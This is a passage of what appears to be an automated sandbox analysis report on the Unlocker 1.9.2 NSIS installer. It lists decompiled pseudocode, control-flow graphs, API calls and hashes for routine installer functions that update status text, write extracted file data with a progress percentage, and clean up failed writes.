                                                                                                                                                              0x004018ad
                                                                                                                                                              0x004018b0
                                                                                                                                                              0x004018c8
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x004018b5
                                                                                                                                                              0x004018be
                                                                                                                                                              0x004018be
                                                                                                                                                              0x004018cd
                                                                                                                                                              0x004018d2
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,show,C:\Program Files\Unlocker,00000000,00000000,00000031), ref: 00401773
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,show,show,00000000,00000000,show,C:\Program Files\Unlocker,00000000,00000000,00000031), ref: 0040179D
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID: C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\nsv5446.tmp$C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll$show
                                                                                                                                                              • API String ID: 1941528284-462429751
                                                                                                                                                              • Opcode ID: 89dec647013ee6528c2b69545b8c488e5fa697e94d303dfd7bd1404993c1dcdb
                                                                                                                                                              • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                                                                                                                                              • Opcode Fuzzy Hash: 89dec647013ee6528c2b69545b8c488e5fa697e94d303dfd7bd1404993c1dcdb
                                                                                                                                                              • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00404D7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 860 404d7b-404d90 861 404e46-404e4a 860->861 862 404d96-404da8 860->862 863 404db3-404dbf lstrlenA 862->863 864 404daa-404dae call 4059ff 862->864 866 404dc1-404dd1 lstrlenA 863->866 867 404ddc-404de0 863->867 864->863 866->861 868 404dd3-404dd7 lstrcatA 866->868 869 404de2-404de9 SetWindowTextA 867->869 870 404def-404df3 867->870 868->867 869->870 871 404df5-404e37 SendMessageA * 3 870->871 872 404e39-404e3b 870->872 871->872 872->861 873 404e3d-404e40 872->873 873->861
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404D7B(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423664; // 0x403f4
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f34; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FF(0, _t39, 0x41fc50, 0x41fc50, _a4);
					}
					_t26 = lstrlenA(0x41fc50);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423648, 0x41fc50); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc50;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc50)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc50, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                                                              0x00404d81
                                                                                                                                                              0x00404d8d
                                                                                                                                                              0x00404d90
                                                                                                                                                              0x00404d96
                                                                                                                                                              0x00404da2
                                                                                                                                                              0x00404da5
                                                                                                                                                              0x00404da8
                                                                                                                                                              0x00404dae
                                                                                                                                                              0x00404dae
                                                                                                                                                              0x00404db4
                                                                                                                                                              0x00404dbc
                                                                                                                                                              0x00404dbf
                                                                                                                                                              0x00404ddc
                                                                                                                                                              0x00404de0
                                                                                                                                                              0x00404de9
                                                                                                                                                              0x00404de9
                                                                                                                                                              0x00404df3
                                                                                                                                                              0x00404dfc
                                                                                                                                                              0x00404e08
                                                                                                                                                              0x00404e0f
                                                                                                                                                              0x00404e13
                                                                                                                                                              0x00404e16
                                                                                                                                                              0x00404e29
                                                                                                                                                              0x00404e37
                                                                                                                                                              0x00404e37
                                                                                                                                                              0x00404e3b
                                                                                                                                                              0x00404e3d
                                                                                                                                                              0x00404e40
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404e40
                                                                                                                                                              0x00404dc1
                                                                                                                                                              0x00404dc9
                                                                                                                                                              0x00404dd1
                                                                                                                                                              0x00404dd7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404dd7
                                                                                                                                                              0x00404dd1
                                                                                                                                                              0x00404dbf
                                                                                                                                                              0x00404e4a

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                              • lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                              • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                              • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\
                                                                                                                                                              • API String ID: 2531174081-1533214826
                                                                                                                                                              • Opcode ID: c117b3df20c288d55b5a21bdd6a2c22ff4c3416e9741a057e5fe706e23abbf15
                                                                                                                                                              • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                                                                                              • Opcode Fuzzy Hash: c117b3df20c288d55b5a21bdd6a2c22ff4c3416e9741a057e5fe706e23abbf15
                                                                                                                                                              • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402E5B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 874 402e5b-402e6f 875 402e71 874->875 876 402e78-402e80 874->876 875->876 877 402e82 876->877 878 402e87-402e8c 876->878 877->878 879 402e9c-402ea9 call 40304e 878->879 880 402e8e-402e97 call 403080 878->880 884 402ff9 879->884 885 402eaf-402eb3 879->885 880->879 886 402ffb-402ffc 884->886 887 402fe2-402fe4 885->887 888 402eb9-402ed9 GetTickCount call 405dd9 885->888 890 403047-40304b 886->890 891 402fe6-402fe9 887->891 892 403039-40303d 887->892 899 403044 888->899 900 402edf-402ee7 888->900 896 402feb 891->896 897 402fee-402ff7 call 40304e 891->897 894 402ffe-403004 892->894 895 40303f 892->895 901 403006 894->901 902 403009-403017 call 40304e 894->902 895->899 896->897 897->884 907 403041 897->907 899->890 904 402ee9 900->904 905 402eec-402efa call 40304e 900->905 901->902 902->884 911 403019-40302c WriteFile 902->911 904->905 905->884 912 402f00-402f09 905->912 907->899 913 402fde-402fe0 911->913 914 40302e-403031 911->914 915 402f0f-402f2c call 405df9 912->915 913->886 914->913 916 403033-403036 914->916 919 402f32-402f49 GetTickCount 915->919 920 402fda-402fdc 915->920 916->892 921 402f4b-402f53 919->921 922 402f8e-402f92 919->922 920->886 925 402f55-402f59 921->925 926 402f5b-402f86 MulDiv wsprintfA call 404d7b 921->926 923 402f94-402f97 922->923 924 402fcf-402fd2 922->924 927 402fb7-402fbd 923->927 928 402f99-402fab WriteFile 923->928 924->900 929 402fd8 924->929 925->922 925->926 931 402f8b 926->931 933 402fc3-402fc7 927->933 928->913 932 402fad-402fb0 928->932 929->899 931->922 932->913 934 402fb2-402fb5 932->934 933->915 935 402fcd 933->935 934->933 935->899
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				int _t66;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f020;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423ed8; // 0x1a434
					E00403080(_t91 + _t60);
				}
				_t62 = E0040304E( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E0040304E(0x40b020, _t98) == 0) {
									goto L34;
								} else {
									_t66 = WriteFile(_a8, 0x40b020, _t98,  &_a12, 0); // executed
									if(_t66 == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E0040304E(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00405DD9(0x40af90);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E0040304E(0x40b020, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40afa8 = 0x40b020;
						 *0x40afac = _t99;
						while(1) {
							 *0x40afb0 = _t88;
							 *0x40afb4 = _v12; // executed
							_t74 = E00405DF9(0x40af90); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40afb0; // 0x7d06ee
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423f34 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404D7B(0,  &_v88); // executed
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40afb0; // 0x7d06ee
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

























                                                                                                                                                              0x00402e63
                                                                                                                                                              0x00402e67
                                                                                                                                                              0x00402e6a
                                                                                                                                                              0x00402e6f
                                                                                                                                                              0x00402e71
                                                                                                                                                              0x00402e71
                                                                                                                                                              0x00402e78
                                                                                                                                                              0x00402e7c
                                                                                                                                                              0x00402e80
                                                                                                                                                              0x00402e82
                                                                                                                                                              0x00402e82
                                                                                                                                                              0x00402e87
                                                                                                                                                              0x00402e8c
                                                                                                                                                              0x00402e8e
                                                                                                                                                              0x00402e97
                                                                                                                                                              0x00402e97
                                                                                                                                                              0x00402ea2
                                                                                                                                                              0x00402ea9
                                                                                                                                                              0x00402ff9
                                                                                                                                                              0x00402ff9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402eaf
                                                                                                                                                              0x00402eb3
                                                                                                                                                              0x00402fe4
                                                                                                                                                              0x00403039
                                                                                                                                                              0x00402ffe
                                                                                                                                                              0x00403004
                                                                                                                                                              0x00403006
                                                                                                                                                              0x00403006
                                                                                                                                                              0x00403017
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403019
                                                                                                                                                              0x00403024
                                                                                                                                                              0x0040302c
                                                                                                                                                              0x00402fde
                                                                                                                                                              0x00402fde
                                                                                                                                                              0x00402ffb
                                                                                                                                                              0x00402ffb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403033
                                                                                                                                                              0x00403033
                                                                                                                                                              0x00403036
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403036
                                                                                                                                                              0x0040302c
                                                                                                                                                              0x00403017
                                                                                                                                                              0x00403044
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403044
                                                                                                                                                              0x00402fe9
                                                                                                                                                              0x00402feb
                                                                                                                                                              0x00402feb
                                                                                                                                                              0x00402ff7
                                                                                                                                                              0x00403041
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402ff7
                                                                                                                                                              0x00402ec4
                                                                                                                                                              0x00402ec7
                                                                                                                                                              0x00402ecc
                                                                                                                                                              0x00402ecc
                                                                                                                                                              0x00402ed6
                                                                                                                                                              0x00402ed9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402edf
                                                                                                                                                              0x00402edf
                                                                                                                                                              0x00402edf
                                                                                                                                                              0x00402ee7
                                                                                                                                                              0x00402ee9
                                                                                                                                                              0x00402ee9
                                                                                                                                                              0x00402efa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402f00
                                                                                                                                                              0x00402f03
                                                                                                                                                              0x00402f09
                                                                                                                                                              0x00402f0f
                                                                                                                                                              0x00402f17
                                                                                                                                                              0x00402f1d
                                                                                                                                                              0x00402f22
                                                                                                                                                              0x00402f29
                                                                                                                                                              0x00402f2c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402f32
                                                                                                                                                              0x00402f38
                                                                                                                                                              0x00402f3a
                                                                                                                                                              0x00402f47
                                                                                                                                                              0x00402f49
                                                                                                                                                              0x00402f77
                                                                                                                                                              0x00402f7d
                                                                                                                                                              0x00402f86
                                                                                                                                                              0x00402f8b
                                                                                                                                                              0x00402f8b
                                                                                                                                                              0x00402f92
                                                                                                                                                              0x00402fd2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402f94
                                                                                                                                                              0x00402f97
                                                                                                                                                              0x00402fb7
                                                                                                                                                              0x00402fba
                                                                                                                                                              0x00402fbd
                                                                                                                                                              0x00402fc3
                                                                                                                                                              0x00402fc7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fcd
                                                                                                                                                              0x00402fa3
                                                                                                                                                              0x00402fab
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00402fab
                                                                                                                                                              0x00402f92
                                                                                                                                                              0x00402fda
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fda
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402edf

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                                                                                              • wsprintfA.USER32 ref: 00402F77
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,007D06EE,00000000,00000000), ref: 00402FA3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                              • API String ID: 4209647438-2449383134
                                                                                                                                                              • Opcode ID: 6f311f0161e6b5a2b9589c42eb5a4067f1e4fce311a25467e7f14920e616ef45
                                                                                                                                                              • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                                                                                                                                              • Opcode Fuzzy Hash: 6f311f0161e6b5a2b9589c42eb5a4067f1e4fce311a25467e7f14920e616ef45
                                                                                                                                                              • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				long _t41;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040553D(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E00405695(_t52);
				_t27 = E004056B4(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423e94; // 0xce00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403080(_t47);
						E0040304E(_t51,  *(_t58 - 0x2c)); // executed
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c)); // executed
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E00405675( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30)); // executed
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47); // executed
						GlobalFree(_t51); // executed
						_t41 = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47); // executed
						 *(_t58 - 8) = _t41;
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}












                                                                                                                                                              0x0040267c
                                                                                                                                                              0x0040267e
                                                                                                                                                              0x0040268a
                                                                                                                                                              0x0040268d
                                                                                                                                                              0x00402697
                                                                                                                                                              0x0040269b
                                                                                                                                                              0x0040269b
                                                                                                                                                              0x004026a1
                                                                                                                                                              0x004026ae
                                                                                                                                                              0x004026b6
                                                                                                                                                              0x004026b9
                                                                                                                                                              0x004026bf
                                                                                                                                                              0x004026cd
                                                                                                                                                              0x004026d2
                                                                                                                                                              0x004026d6
                                                                                                                                                              0x004026d9
                                                                                                                                                              0x004026e2
                                                                                                                                                              0x004026ee
                                                                                                                                                              0x004026f2
                                                                                                                                                              0x004026f5
                                                                                                                                                              0x004026ff
                                                                                                                                                              0x0040271e
                                                                                                                                                              0x00402706
                                                                                                                                                              0x0040270b
                                                                                                                                                              0x00402713
                                                                                                                                                              0x00402716
                                                                                                                                                              0x0040271b
                                                                                                                                                              0x0040271b
                                                                                                                                                              0x00402725
                                                                                                                                                              0x00402725
                                                                                                                                                              0x00402737
                                                                                                                                                              0x0040273e
                                                                                                                                                              0x0040274b
                                                                                                                                                              0x00402750
                                                                                                                                                              0x00402750
                                                                                                                                                              0x00402756
                                                                                                                                                              0x00402756
                                                                                                                                                              0x00402761
                                                                                                                                                              0x00402762
                                                                                                                                                              0x00402766
                                                                                                                                                              0x0040276a
                                                                                                                                                              0x00402770
                                                                                                                                                              0x00402770
                                                                                                                                                              0x00402777
                                                                                                                                                              0x00402164
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000CE00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                                                              • GlobalFree.KERNELBASE ref: 00402725
                                                                                                                                                              • WriteFile.KERNELBASE(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3294113728-0
                                                                                                                                                              • Opcode ID: 130aa79b9c983bd4e060f1967264d3b910e55c34024405a00a28679471b0e476
